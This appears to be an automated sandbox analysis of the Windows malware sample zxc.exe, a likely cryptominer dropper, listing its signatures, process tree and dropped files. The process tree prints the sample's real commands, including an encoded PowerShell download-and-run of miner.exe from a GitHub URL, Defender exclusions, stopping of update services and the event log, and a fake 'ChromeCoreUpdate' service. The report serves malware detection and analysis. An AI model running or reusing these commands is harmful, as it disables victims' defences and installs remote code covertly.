Analysis

  • max time kernel
    1800s
  • max time network
    1791s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-11-2024 19:36

General

  • Target

    zxc.exe

  • Size

    6KB

  • MD5

    1037e4868002ea28986b067e602219d5

  • SHA1

    eb606ee00af1c8e3982d827819feb020e552602e

  • SHA256

    cc938a7173b4bf5863d698d322be43378d520bdea430a390496b016c85410706

  • SHA512

    4924969ef9398f3a45ada5dfbaeab93d92d761100fd174075b53fbfe116738b31bc338a904a102631a7239ee8f82b8bd3ca222053385fb686820ef543ea6e183

  • SSDEEP

    96:TH79mNb60qvjnMmt3VI9dXlO5NzO6M8Ac/h6zanF3d3oj4rl:P9gqvjn3QdXlWNzOH8Ac/hT3d/

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 17 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:340
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:664
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:960
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:740
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:896
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
              1⤵
                PID:1120
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                1⤵
                • Indicator Removal: Clear Windows Event Logs
                PID:1140
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1148
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  1⤵
                  • Drops file in System32 directory
                  PID:1156
                  • C:\Windows\system32\taskhostw.exe
                    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                    2⤵
                      PID:2804
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                    1⤵
                      PID:1232
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                      1⤵
                        PID:1316
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                        1⤵
                          PID:1324
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                          1⤵
                            PID:1388
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            1⤵
                              PID:1448
                              • C:\Windows\system32\sihost.exe
                                sihost.exe
                                2⤵
                                  PID:2588
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                1⤵
                                  PID:1528
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                  1⤵
                                    PID:1536
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                    1⤵
                                      PID:1680
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1712
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                        1⤵
                                          PID:1764
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                          1⤵
                                            PID:1800
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1848
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                              1⤵
                                                PID:1900
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1912
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                  1⤵
                                                    PID:2016
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:1456
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                      1⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2080
                                                    • C:\Windows\System32\spoolsv.exe
                                                      C:\Windows\System32\spoolsv.exe
                                                      1⤵
                                                        PID:2116
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                        1⤵
                                                          PID:2224
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:2240
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                            1⤵
                                                              PID:2560
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                              1⤵
                                                                PID:2568
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                1⤵
                                                                  PID:2668
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                  1⤵
                                                                  • Drops file in System32 directory
                                                                  PID:2788
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                  1⤵
                                                                    PID:2812
                                                                  • C:\Windows\sysmon.exe
                                                                    C:\Windows\sysmon.exe
                                                                    1⤵
                                                                      PID:2856
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                      1⤵
                                                                        PID:2876
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                        1⤵
                                                                          PID:2888
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                          1⤵
                                                                            PID:2904
                                                                          • C:\Windows\system32\wbem\unsecapp.exe
                                                                            C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                            1⤵
                                                                              PID:3024
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                              1⤵
                                                                                PID:3520
                                                                              • C:\Windows\Explorer.EXE
                                                                                C:\Windows\Explorer.EXE
                                                                                1⤵
                                                                                  PID:3588
                                                                                  • C:\Users\Admin\AppData\Local\Temp\zxc.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\zxc.exe"
                                                                                    2⤵
                                                                                    • Checks computer location settings
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:4048
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAdQB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcgByAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgB2AGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcwB3AHMAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwBCAHkAdABlAHIAQwBvAGQAZQAvAG0AaQBuAGUAcgAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBtAGkAbgBlAHIALgBlAHgAZQAnACwAIAA8ACMAZQBrAGUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBkAHoAbAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBxAHUAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB4AGQAdwBkAC4AZQB4AGUAJwApACkAPAAjAHgAcgBhACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGsAaQBqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBlAHgAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB4AGQAdwBkAC4AZQB4AGUAJwApADwAIwBkAHYAdAAjAD4A"
                                                                                      3⤵
                                                                                      • Blocklisted process makes network request
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:1384
                                                                                      • C:\Users\Admin\AppData\Roaming\xdwd.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\xdwd.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        • Drops file in System32 directory
                                                                                        • Suspicious use of SetThreadContext
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:3040
                                                                                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2780
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                          5⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:4584
                                                                                          • C:\Windows\system32\wusa.exe
                                                                                            wusa /uninstall /kb:890830 /quiet /norestart
                                                                                            6⤵
                                                                                              PID:3208
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            C:\Windows\system32\sc.exe stop UsoSvc
                                                                                            5⤵
                                                                                            • Launches sc.exe
                                                                                            PID:4900
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                            5⤵
                                                                                            • Launches sc.exe
                                                                                            PID:3832
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            C:\Windows\system32\sc.exe stop wuauserv
                                                                                            5⤵
                                                                                            • Launches sc.exe
                                                                                            PID:4836
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            C:\Windows\system32\sc.exe stop bits
                                                                                            5⤵
                                                                                            • Launches sc.exe
                                                                                            PID:2432
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            C:\Windows\system32\sc.exe stop dosvc
                                                                                            5⤵
                                                                                            • Launches sc.exe
                                                                                            PID:4176
                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                            5⤵
                                                                                            • Power Settings
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:4336
                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                            5⤵
                                                                                            • Power Settings
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:3684
                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                            5⤵
                                                                                            • Power Settings
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:60
                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                            5⤵
                                                                                            • Power Settings
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:3856
                                                                                          • C:\Windows\system32\dialer.exe
                                                                                            C:\Windows\system32\dialer.exe
                                                                                            5⤵
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4272
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            C:\Windows\system32\sc.exe delete "ChromeCoreUpdate"
                                                                                            5⤵
                                                                                            • Launches sc.exe
                                                                                            PID:1972
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            C:\Windows\system32\sc.exe create "ChromeCoreUpdate" binpath= "C:\ProgramData\Updater\Updater32.exe" start= "auto"
                                                                                            5⤵
                                                                                            • Launches sc.exe
                                                                                            PID:4044
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            C:\Windows\system32\sc.exe stop eventlog
                                                                                            5⤵
                                                                                            • Launches sc.exe
                                                                                            PID:1932
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            C:\Windows\system32\sc.exe start "ChromeCoreUpdate"
                                                                                            5⤵
                                                                                            • Launches sc.exe
                                                                                            PID:3368
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              6⤵
                                                                                                PID:1780
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                      1⤵
                                                                                        PID:3748
                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                        1⤵
                                                                                          PID:3928
                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                          1⤵
                                                                                            PID:3004
                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                            1⤵
                                                                                              PID:4212
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                              1⤵
                                                                                                PID:548
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                1⤵
                                                                                                  PID:2028
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                  1⤵
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:4248
                                                                                                • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                  1⤵
                                                                                                  • Drops file in System32 directory
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:2328
                                                                                                • C:\Windows\system32\SppExtComObj.exe
                                                                                                  C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:4744
                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                    1⤵
                                                                                                      PID:2864
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                      1⤵
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:1776
                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                      1⤵
                                                                                                        PID:1100
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                        1⤵
                                                                                                          PID:3508
                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:1744
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                            1⤵
                                                                                                            • Drops file in Windows directory
                                                                                                            PID:3992
                                                                                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                            C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                            1⤵
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Checks SCSI registry key(s)
                                                                                                            • Checks processor information in registry
                                                                                                            • Enumerates system info in registry
                                                                                                            PID:3056
                                                                                                          • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                            C:\Windows\servicing\TrustedInstaller.exe
                                                                                                            1⤵
                                                                                                              PID:1472
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                              1⤵
                                                                                                                PID:1728
                                                                                                              • C:\Windows\System32\mousocoreworker.exe
                                                                                                                C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                1⤵
                                                                                                                • Checks processor information in registry
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                PID:3172
                                                                                                              • C:\ProgramData\Updater\Updater32.exe
                                                                                                                C:\ProgramData\Updater\Updater32.exe
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Drops file in System32 directory
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:4164
                                                                                                                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                  2⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:3648
                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    3⤵
                                                                                                                      PID:4084
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                    2⤵
                                                                                                                      PID:4816
                                                                                                                      • C:\Windows\system32\wusa.exe
                                                                                                                        wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                        3⤵
                                                                                                                          PID:1636
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                        2⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:5084
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                        2⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:4916
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                        2⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:5104
                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          3⤵
                                                                                                                            PID:4124
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          C:\Windows\system32\sc.exe stop bits
                                                                                                                          2⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:2136
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          C:\Windows\system32\sc.exe stop dosvc
                                                                                                                          2⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:2624
                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            3⤵
                                                                                                                              PID:4960
                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                            2⤵
                                                                                                                            • Power Settings
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:3476
                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              3⤵
                                                                                                                                PID:3388
                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                              2⤵
                                                                                                                              • Power Settings
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:4488
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                3⤵
                                                                                                                                  PID:2556
                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                2⤵
                                                                                                                                • Power Settings
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:4648
                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  3⤵
                                                                                                                                    PID:1612
                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                  2⤵
                                                                                                                                  • Power Settings
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:3536
                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    3⤵
                                                                                                                                      PID:4220
                                                                                                                                  • C:\Windows\system32\dialer.exe
                                                                                                                                    C:\Windows\system32\dialer.exe
                                                                                                                                    2⤵
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:4764
                                                                                                                                  • C:\Windows\system32\dialer.exe
                                                                                                                                    C:\Windows\system32\dialer.exe
                                                                                                                                    2⤵
                                                                                                                                      PID:1580
                                                                                                                                    • C:\Windows\system32\dialer.exe
                                                                                                                                      dialer.exe
                                                                                                                                      2⤵
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:2680
                                                                                                                                  • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                                    C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                                    1⤵
                                                                                                                                    • Drops file in Windows directory
                                                                                                                                    PID:3684

                                                                                                                                  Network

                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                  Replay Monitor

                                                                                                                                  Loading Replay Monitor...

                                                                                                                                  Downloads

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                    Filesize

                                                                                                                                    3KB

                                                                                                                                    MD5

                                                                                                                                    556084f2c6d459c116a69d6fedcc4105

                                                                                                                                    SHA1

                                                                                                                                    633e89b9a1e77942d822d14de6708430a3944dbc

                                                                                                                                    SHA256

                                                                                                                                    88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

                                                                                                                                    SHA512

                                                                                                                                    0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                    Filesize

                                                                                                                                    1KB

                                                                                                                                    MD5

                                                                                                                                    7dd8e4f2517f6deec77fba323ac37f81

                                                                                                                                    SHA1

                                                                                                                                    e264fb735ddbf68945de4aa62f378fb262fea889

                                                                                                                                    SHA256

                                                                                                                                    9ba62fdde3544a604a0ea671bcd5cf62ced3439a1d02d5069ae8b6b5c8652ea6

                                                                                                                                    SHA512

                                                                                                                                    b638efaf087717eca0da414824741291a2043e254ade639182c21d35f23e3c24abffb79b43f42fb0fbe5a78aa5b357a4e6f64e4e7e8ef511143a2565bb86185e

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tpsuwdbh.qhq.ps1

                                                                                                                                    Filesize

                                                                                                                                    60B

                                                                                                                                    MD5

                                                                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                    SHA1

                                                                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                    SHA256

                                                                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                    SHA512

                                                                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                  • C:\Users\Admin\AppData\Roaming\xdwd.exe

                                                                                                                                    Filesize

                                                                                                                                    5.2MB

                                                                                                                                    MD5

                                                                                                                                    adc76054a5b22974290b540fca4adf19

                                                                                                                                    SHA1

                                                                                                                                    a39741c3946cda5caae31ca9711cadd64720bbe5

                                                                                                                                    SHA256

                                                                                                                                    b036f0b4078be1866cbba1b3a4d1098629668e8ce4bd0167c308f00b7d86adb7

                                                                                                                                    SHA512

                                                                                                                                    0369bee44ce5fe7c077af194fd7200e7b413cd807d8c529a69031705ada18572d808e46222aaf557110a86ab65ca437670e5ea3168d8dcac0c4222ae301be631

                                                                                                                                  • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                    Filesize

                                                                                                                                    328B

                                                                                                                                    MD5

                                                                                                                                    6c0b9a9364f9d2eb4f779e41a2cffd52

                                                                                                                                    SHA1

                                                                                                                                    99eaaa95f1492f3493d3ba30856a5dfee23dfb43

